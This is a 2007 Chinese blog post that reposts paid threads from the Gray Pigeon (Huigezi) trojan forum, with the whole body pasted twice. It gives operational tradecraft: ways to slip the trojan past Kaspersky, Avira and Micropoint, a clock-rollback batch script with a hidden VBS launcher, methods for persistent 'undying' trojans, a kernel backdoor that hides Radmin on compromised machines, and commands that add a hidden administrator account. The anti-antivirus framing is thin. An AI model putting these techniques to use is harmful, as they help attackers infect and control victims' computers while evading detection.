Sunday, April 15, 2007
木马灰鸽子VIP论坛文章分享,告戒大家不要迷信“杀软”
来源:清心论坛
灰鸽子会员收费论坛就这么多精品帖,花100元/年办VIP根本不值得。剩下有不少帖是下载VIP免杀更新的,加壳加花工具的(可能工具里面本身就有捆绑木马供会员下载,我就不上传到清心了),还有些是外部连接下载我已经删除处理(清心不能发连接)
里面有仅次于灰鸽子作者葛军的二号人物凤凰木马鸽子主代理论坛weiwen的原创帖子,不乏对付或摧毁小红伞antivir以及卡巴斯基的方法,全部收费内容供清心网友免费学习!!!
帖子内容介绍:“灰鸽子病毒”由于所谓的“新闻联播”的报道,现已转 入地下,已经不再收VIP会员(原来成为VIP要100元/年),本人“huigezi”(原清心的“jaycn”)破解了几个VIP的ID,上灰鸽子论 坛将VIP或者有“威望”才能看的精华贴整理了一下,发到清心,供大家学习计算机安全高级知识,有一些木马“免杀”(免于杀软查杀)的技术,属“贼”对付 所谓“警察”的技术,给特别是迷信所谓“杀软”(所谓的“杀毒软件”)、“防火墙”的朋友一个警戒,属本人原创帖,我将多个鸽子VIP论坛的精华贴整理到 一起发
100%过卡巴6.0行为的方法
本帖被 weiwen 执行加亮操作(2007-04-04)
在我们新的修改版没有公布出来之前,凤凰会员暂时可用这种方法卡巴6.0的行为拦截。
1.过卡巴6.0的启动拦截的方法:如:在安装名称$(WinDir)\G_Server2006.exe改为$(WinDir)\G_Server2006去除后缀的方法。
2.过两个插入进程的提示方法:只要在高级选择中的1和3不打勾即可。
3.可以重新修改插入进程,这样就100%过卡巴的6.0行为了。
注:通常新用户修改第一步已经OK的了,因为卡巴的默认安装后是不打开进程插入监控的.
经过几天的努力..终于做出了第一次过小红伞的VIP1.23无壳鸽子
大家可以测试一下.. 可以导入配置信息(原配置信息已经删掉.运行了也没关系).
只做了小红伞的免杀..其他都没做..主要是发出来跟大家分享一下...
只能发连接...
刚改了下载连接..现在可以直接下载了!!!
修改方法简单可以这样说
加花打底/定位特征码/查出特征码为输入表的DLL的文件名(DLL文件名无法修改和移动)/ 再移动输入表信息(特征码会自动转移,很BT,红伞似乎会跟着你的变化而变化)/再找一个红伞查杀行走路线的点给NOP掉(本人找不到原理,纯粹靠试 验...原理还需要近一步研究)(因为改特征点已经无用.只能在它的"行走"路线上设卡..)
以上说法可能存在不对之处,请高人指明..
过卡吧主动防御思路
思路就是修改系统时间,达到卡巴实效,然后鸽子运行,然后再把系统时间改回来,首先要准备好你的免杀鸽子
先打开记事本,把以下代码保存为time.bat,(文字全为说明,不用复制)
@echo
set date=%date% 令参数%data%等于现在的日期,一会儿恢复时间用
date 1987-12-18 修改系统时间使卡巴监控失效
ping -n 10 127.0.0.1 等待10秒,10秒后卡巴已经挂了,
start notepad 运行程序(可以换成鸽子)
ping -n 5 127.0.0.1 等待5秒,
date %date% 改回来时间,卡巴又复活了
但是运行的那个DOS窗口实在看着不爽
我们在建个脚本,打开记事本,把以下代码保存为a.vbs
Set shell = Wscript.createobject("wscript.shell")
a = shell.run ("time.bat",0)
现在已经隐藏运行了,有条件的可以改造,甚至可以根据这个思路写个小程序
本帖最近评分记录:
凤凰币:10 (By weiwen) | 2007-02-01 11
要过葛军自家专杀很简单,配置的时候无注册,无服务,无后缀,配置出来后改进程,自定义启动方式,反正别用鸽子自带的启动方式就OK了,具体做法就是把配置好的无注册和服务的EXE做成资源,用DELPHI或VB以捆绑方式重新编译下,加入自定义开机启动方式,保证什么自己专杀也傻瓜。
配制的时只选注册表启动一项就可以过专杀
过鸽子自家专杀以及不死神鸽子的制作方法.
首先申明下,此方法需要编程基础,并非人人能掌握.
一:过葛军专杀,首先配置鸽子服务端,记住无注册,无服务,无后缀,不要隐藏进程,注射IE.配置结束后修改注射进程,注射到一些无法结束的系统 进程就行,不过虽然系统进程,但是还是能结束的,为什么?因为注射并非DLL加载,还是有相同的独立进程,经验丰富的老鸟随便就结束掉了,但是糊下菜鸟没 什么问题,上面改完的话已经过掉了IE防漏和一般的专杀,但是运行有问题,因为无启动项.下面把改好进程,测试没问题的服务端再进行免杀,免杀的方法就不 详细说了,相关教程很多,免杀完毕开始过葛军专杀,把配置好的鸽子服务端当作资源,用DELPHI或VB用资源捆绑方式,并加入自定义开机启动方式,如何 开机启动方式还是用注册表吧,写的好的话直接连卡巴主防的注册表监控都过,甚至可以领先于系统启动.到这里,葛军专杀就已经过了,不信的话自己测试去.
二:杀软杀不尽,关机开又来的不死神鸽.首先还是配置,无注册,无服务,注射IE,不隐藏进程,重要的一点,运行后不要删除本身.然后还是修改 进程,免杀等等,这里的鸽子服务端免杀要保证文件都过,内存什么的没什么关系,改完后就开始再次用DELPHI或VB资源捆绑了,这次有点麻烦,要设置好 这个不删除本身服务端的复制路径,同时资源捆绑的文件要本身删除,不留痕迹,还要加入自定义开机启动指向那个运行后不删除自身的服务端,这样就实现了不死 神鸽,运行原理是这样的,开机启动服务端,并且复制到指定路径启动,这样就过了自家专杀,行为,防漏,主动,等等,哪怕被内存查杀,甚至对应文件查杀,只 要保证你的不删除服务端不被查杀,则杀软杀不尽,开机又回来.
黑客守卫者+鸽子免杀=无敌神鸽
[post] 我们都知道凤凰VIP的免杀鸽子很好用,这是公认的,这个鸽子中到家用PC上还可以但要是放到服务器上就有点让人担心了.
1.管理员查下进程就OK了,
2.看下可以服务,因为鸽子他会加为服务,
3.netstat -an这个我就不用说了吧 大家都知道.
好了,现在我就为大家做个无敌神鸽,其实用一个软件就可以了,
黑客守卫者,一个内核级后门软件,先看下他的说明大家就都明白了,
黑客守护者是一款异常强大的驱动级后门!可以隐藏你的木马和后门的端口,服务,进程
这里写入你要隐藏的文件和文件夹名称
第一个是隐藏黑客守卫者自己的,建议不要删除
好,比如我们给肉鸡装了个Radmin吧,那我们就在隐藏文件里把它的服务端文件rserver.exe加到这里
注意一行一个哦~
你也可以用通配符*
这样到话只要是以rserv开头到文件夹和文件名都会隐藏
------------------------
隐藏进程和隐藏文件一样
我们把rserver.exe也加到这里
当然,它同样支持通配符*
下面是隐藏服务
Radmin的服务名是r_server
所以我们把它加到下面
------------------------
隐藏端口
4899是RADMIN到默认端口,TCP协议的,那么我们在TCP端口里面添上4899
可能你还开了肉鸡的3389,那我们把3389也加到里面,用[,]隔开
UDP端口和TCP端口一样
------------------------
隐藏注册表
已经有的是黑客守卫者自己的注册表项
你可以在这里把你的木马的注册表项隐藏
RADMIN的注册表项是RAdmin
所以我们加到里面就可以了
------------------------
跟随启动
就是让某个程序跟随黑客守卫者启动
它支持系统变量和运行参数
比如要肉鸡开机后添加一个用户
我们可以这样添
%windir%\system32\cmd.exe /c net user coofly 123456 /add
你要提权这个用户的话再加一个
%windir%\system32\cmd.exe /c net localgroup administrators coofly /add
这样就好了``
------------------------
后门设置
黑客守卫者启动后,你可以从任意一个端口用黑客守卫者提供的客户端进行连接,得到一个管理员权限的CMD SHELL
连接密码就是你登录SHELL的密码了
黑客守卫者是以驱动和服务两种方法启动的
服务名称就是黑客守卫者的启动服务名称了
显示名称和描述大家应该都明白,如果改了服务名称,那么在隐藏服务里应该把改后的服务名称也加进去
比如我改成
hackdoor
那么我们应该在隐藏服务里它把也加进去
驱动名称和驱动文件名称可以随便改
不过要注意的是驱动文件名称必须是.SYS结尾的
------------------------
生成配置
现在已经配置好了,我们可以生成配置文件了
点生成配置,然后选择保存位置
添上文件名,点保存就可以OK咯!!~
现在大家应该明白怎么可以做出无敌的鸽子了吧!
因为黑客守卫者生成出来的是两个文件你要想和鸽子捆绑到一块可以用个凤凰的捆绑软件就可以了..[/post]
对世面上出现几款远控调查
上兴 18 票
牧民灰鸽子 8 票
网络红娘 3 票
守望者 4 票
熊宝宝远控 6 票
黑洞 13 票
黑赢 2 票
其他…… 9 票
病毒灰鸽子论坛管理员weiwen发的帖子:
今天对微点进行了一次鸽子上线的测试!
本帖被 weiwen 执行提前操作(2007-04-06)
今天对微点(微点主动防御软件(Micropoint Proactive Defense Software)) 进行了一次鸽子上线的测试,微点真是如用户所讲的如此历害吗?经过我半个小时的测试和修改(服务端不需要太大的修改),鸽子非常轻易的上线了(有图为 证),而且微点没有任何的提示(全开监控状态),对微点真是非常失望,经过这么多年的经验,个人感觉什么杀软都不可信,更不要信谁强谁弱,其实本质一样, 而且令我更加相信了杀软公司的商业行为,赚钱!!!!
注明:重启PC后微点同样没有任何的提示下上线!
测试后本人对微点杀软体会:集合了各大杀软的欺骗手法,换句话讲只是对鸽子代码比较了解深一些,并不是技术性的行为拦截和查杀。
看来还是杀软+防火墙+PG+还原工具或+虚拟机才能安全了
杀软+防火墙+hips,再加上良好的上网习惯。
用还原工具冰点(Deep freeze)就不用装虚拟机,“影子系统”这个软件的安全性我的评估(“影子系统”可能自身就是木马http://qxbbs.org/viewtopic.php?t=192973),而联想冰封可能是是中共邪教中科院的作品,也用不得
卡巴斯基“行为分析”以及“主动防御”技术、微点主动防御软件以及德国的小红伞AntiVir都在灰鸽子管理员的破坏之列,看来杀软真的不可信
灰鸽子会员收费论坛就这么多精品帖,花100元/年办VIP根本不值得。剩下有不少帖是下载VIP免杀更新的,加壳加花工具的(可能工具里面本身就有捆绑木马供会员下载,我就不上传到清心了),还有些是外部连接下载我已经删除处理(清心不能发连接)
里面有仅次于灰鸽子作者葛军的二号人物凤凰木马鸽子主代理论坛weiwen的原创帖子,不乏对付或摧毁小红伞antivir以及卡巴斯基的方法,全部收费内容供清心网友免费学习!!!
帖子内容介绍:“灰鸽子病毒”由于所谓的“新闻联播”的报道,现已转 入地下,已经不再收VIP会员(原来成为VIP要100元/年),本人“huigezi”(原清心的“jaycn”)破解了几个VIP的ID,上灰鸽子论 坛将VIP或者有“威望”才能看的精华贴整理了一下,发到清心,供大家学习计算机安全高级知识,有一些木马“免杀”(免于杀软查杀)的技术,属“贼”对付 所谓“警察”的技术,给特别是迷信所谓“杀软”(所谓的“杀毒软件”)、“防火墙”的朋友一个警戒,属本人原创帖,我将多个鸽子VIP论坛的精华贴整理到 一起发
100%过卡巴6.0行为的方法
本帖被 weiwen 执行加亮操作(2007-04-04)
在我们新的修改版没有公布出来之前,凤凰会员暂时可用这种方法卡巴6.0的行为拦截。
1.过卡巴6.0的启动拦截的方法:如:在安装名称$(WinDir)\G_Server2006.exe改为$(WinDir)\G_Server2006去除后缀的方法。
2.过两个插入进程的提示方法:只要在高级选择中的1和3不打勾即可。
3.可以重新修改插入进程,这样就100%过卡巴的6.0行为了。
注:通常新用户修改第一步已经OK的了,因为卡巴的默认安装后是不打开进程插入监控的.
经过几天的努力..终于做出了第一次过小红伞的VIP1.23无壳鸽子
大家可以测试一下.. 可以导入配置信息(原配置信息已经删掉.运行了也没关系).
只做了小红伞的免杀..其他都没做..主要是发出来跟大家分享一下...
只能发连接...
刚改了下载连接..现在可以直接下载了!!!
修改方法简单可以这样说
加花打底/定位特征码/查出特征码为输入表的DLL的文件名(DLL文件名无法修改和移动)/ 再移动输入表信息(特征码会自动转移,很BT,红伞似乎会跟着你的变化而变化)/再找一个红伞查杀行走路线的点给NOP掉(本人找不到原理,纯粹靠试 验...原理还需要近一步研究)(因为改特征点已经无用.只能在它的"行走"路线上设卡..)
以上说法可能存在不对之处,请高人指明..
过卡吧主动防御思路
思路就是修改系统时间,达到卡巴实效,然后鸽子运行,然后再把系统时间改回来,首先要准备好你的免杀鸽子
先打开记事本,把以下代码保存为time.bat,(文字全为说明,不用复制)
@echo
set date=%date% 令参数%data%等于现在的日期,一会儿恢复时间用
date 1987-12-18 修改系统时间使卡巴监控失效
ping -n 10 127.0.0.1 等待10秒,10秒后卡巴已经挂了,
start notepad 运行程序(可以换成鸽子)
ping -n 5 127.0.0.1 等待5秒,
date %date% 改回来时间,卡巴又复活了
但是运行的那个DOS窗口实在看着不爽
我们在建个脚本,打开记事本,把以下代码保存为a.vbs
Set shell = Wscript.createobject("wscript.shell")
a = shell.run ("time.bat",0)
现在已经隐藏运行了,有条件的可以改造,甚至可以根据这个思路写个小程序
本帖最近评分记录:
凤凰币:10 (By weiwen) | 2007-02-01 11
要过葛军自家专杀很简单,配置的时候无注册,无服务,无后缀,配置出来后改进程,自定义启动方式,反正别用鸽子自带的启动方式就OK了,具体做法就是把配置好的无注册和服务的EXE做成资源,用DELPHI或VB以捆绑方式重新编译下,加入自定义开机启动方式,保证什么自己专杀也傻瓜。
配制的时只选注册表启动一项就可以过专杀
过鸽子自家专杀以及不死神鸽子的制作方法.
首先申明下,此方法需要编程基础,并非人人能掌握.
一:过葛军专杀,首先配置鸽子服务端,记住无注册,无服务,无后缀,不要隐藏进程,注射IE.配置结束后修改注射进程,注射到一些无法结束的系统 进程就行,不过虽然系统进程,但是还是能结束的,为什么?因为注射并非DLL加载,还是有相同的独立进程,经验丰富的老鸟随便就结束掉了,但是糊下菜鸟没 什么问题,上面改完的话已经过掉了IE防漏和一般的专杀,但是运行有问题,因为无启动项.下面把改好进程,测试没问题的服务端再进行免杀,免杀的方法就不 详细说了,相关教程很多,免杀完毕开始过葛军专杀,把配置好的鸽子服务端当作资源,用DELPHI或VB用资源捆绑方式,并加入自定义开机启动方式,如何 开机启动方式还是用注册表吧,写的好的话直接连卡巴主防的注册表监控都过,甚至可以领先于系统启动.到这里,葛军专杀就已经过了,不信的话自己测试去.
二:杀软杀不尽,关机开又来的不死神鸽.首先还是配置,无注册,无服务,注射IE,不隐藏进程,重要的一点,运行后不要删除本身.然后还是修改 进程,免杀等等,这里的鸽子服务端免杀要保证文件都过,内存什么的没什么关系,改完后就开始再次用DELPHI或VB资源捆绑了,这次有点麻烦,要设置好 这个不删除本身服务端的复制路径,同时资源捆绑的文件要本身删除,不留痕迹,还要加入自定义开机启动指向那个运行后不删除自身的服务端,这样就实现了不死 神鸽,运行原理是这样的,开机启动服务端,并且复制到指定路径启动,这样就过了自家专杀,行为,防漏,主动,等等,哪怕被内存查杀,甚至对应文件查杀,只 要保证你的不删除服务端不被查杀,则杀软杀不尽,开机又回来.
黑客守卫者+鸽子免杀=无敌神鸽
[post] 我们都知道凤凰VIP的免杀鸽子很好用,这是公认的,这个鸽子中到家用PC上还可以但要是放到服务器上就有点让人担心了.
1.管理员查下进程就OK了,
2.看下可以服务,因为鸽子他会加为服务,
3.netstat -an这个我就不用说了吧 大家都知道.
好了,现在我就为大家做个无敌神鸽,其实用一个软件就可以了,
黑客守卫者,一个内核级后门软件,先看下他的说明大家就都明白了,
黑客守护者是一款异常强大的驱动级后门!可以隐藏你的木马和后门的端口,服务,进程
这里写入你要隐藏的文件和文件夹名称
第一个是隐藏黑客守卫者自己的,建议不要删除
好,比如我们给肉鸡装了个Radmin吧,那我们就在隐藏文件里把它的服务端文件rserver.exe加到这里
注意一行一个哦~
你也可以用通配符*
这样到话只要是以rserv开头到文件夹和文件名都会隐藏
------------------------
隐藏进程和隐藏文件一样
我们把rserver.exe也加到这里
当然,它同样支持通配符*
下面是隐藏服务
Radmin的服务名是r_server
所以我们把它加到下面
------------------------
隐藏端口
4899是RADMIN到默认端口,TCP协议的,那么我们在TCP端口里面添上4899
可能你还开了肉鸡的3389,那我们把3389也加到里面,用[,]隔开
UDP端口和TCP端口一样
------------------------
隐藏注册表
已经有的是黑客守卫者自己的注册表项
你可以在这里把你的木马的注册表项隐藏
RADMIN的注册表项是RAdmin
所以我们加到里面就可以了
------------------------
跟随启动
就是让某个程序跟随黑客守卫者启动
它支持系统变量和运行参数
比如要肉鸡开机后添加一个用户
我们可以这样添
%windir%\system32\cmd.exe /c net user coofly 123456 /add
你要提权这个用户的话再加一个
%windir%\system32\cmd.exe /c net localgroup administrators coofly /add
这样就好了``
------------------------
后门设置
黑客守卫者启动后,你可以从任意一个端口用黑客守卫者提供的客户端进行连接,得到一个管理员权限的CMD SHELL
连接密码就是你登录SHELL的密码了
黑客守卫者是以驱动和服务两种方法启动的
服务名称就是黑客守卫者的启动服务名称了
显示名称和描述大家应该都明白,如果改了服务名称,那么在隐藏服务里应该把改后的服务名称也加进去
比如我改成
hackdoor
那么我们应该在隐藏服务里它把也加进去
驱动名称和驱动文件名称可以随便改
不过要注意的是驱动文件名称必须是.SYS结尾的
------------------------
生成配置
现在已经配置好了,我们可以生成配置文件了
点生成配置,然后选择保存位置
添上文件名,点保存就可以OK咯!!~
现在大家应该明白怎么可以做出无敌的鸽子了吧!
因为黑客守卫者生成出来的是两个文件你要想和鸽子捆绑到一块可以用个凤凰的捆绑软件就可以了..[/post]
对世面上出现几款远控调查
上兴 18 票
牧民灰鸽子 8 票
网络红娘 3 票
守望者 4 票
熊宝宝远控 6 票
黑洞 13 票
黑赢 2 票
其他…… 9 票
病毒灰鸽子论坛管理员weiwen发的帖子:
今天对微点进行了一次鸽子上线的测试!
本帖被 weiwen 执行提前操作(2007-04-06)
今天对微点(微点主动防御软件(Micropoint Proactive Defense Software)) 进行了一次鸽子上线的测试,微点真是如用户所讲的如此历害吗?经过我半个小时的测试和修改(服务端不需要太大的修改),鸽子非常轻易的上线了(有图为 证),而且微点没有任何的提示(全开监控状态),对微点真是非常失望,经过这么多年的经验,个人感觉什么杀软都不可信,更不要信谁强谁弱,其实本质一样, 而且令我更加相信了杀软公司的商业行为,赚钱!!!!
注明:重启PC后微点同样没有任何的提示下上线!
测试后本人对微点杀软体会:集合了各大杀软的欺骗手法,换句话讲只是对鸽子代码比较了解深一些,并不是技术性的行为拦截和查杀。
看来还是杀软+防火墙+PG+还原工具或+虚拟机才能安全了
杀软+防火墙+hips,再加上良好的上网习惯。
用还原工具冰点(Deep freeze)就不用装虚拟机,“影子系统”这个软件的安全性我的评估(“影子系统”可能自身就是木马http://qxbbs.org/viewtopic.php?t=192973),而联想冰封可能是是中共邪教中科院的作品,也用不得
卡巴斯基“行为分析”以及“主动防御”技术、微点主动防御软件以及德国的小红伞AntiVir都在灰鸽子管理员的破坏之列,看来杀软真的不可信
Labels: antivirus